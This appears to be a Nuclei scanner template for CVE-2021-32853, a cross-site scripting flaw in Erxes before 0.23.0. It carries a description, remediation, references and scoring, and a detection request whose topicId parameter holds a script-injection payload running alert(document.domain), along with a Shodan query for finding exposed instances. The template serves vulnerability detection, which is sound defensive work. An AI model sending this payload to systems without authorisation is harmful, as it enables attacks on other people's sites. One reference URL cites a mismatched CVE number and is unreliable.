id: CVE-2021-32853 info: name: Erxes <0.23.0 - Cross-Site Scripting author: dwisiswant0 severity: critical description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. remediation: | Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14 - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2021-32853 cwe-id: CWE-79 epss-score: 0.00585 epss-percentile: 0.75704 cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: erxes product: erxes shodan-query: http.title:"erxes" tags: cve,cve2021,xss,erxes,oss http: - method: GET path: - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - 'topic_id: "' - "window.erxesEnv" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100d94c15a5d3eb585e2894400801e6f5eafe324ec35e0ef552d474e632f1db607a0221008101016329ada26823fe23c117cae2ef43aeae797823d6c1e95386faf0a01d71:922c64590222798bb761d5b6d8e72950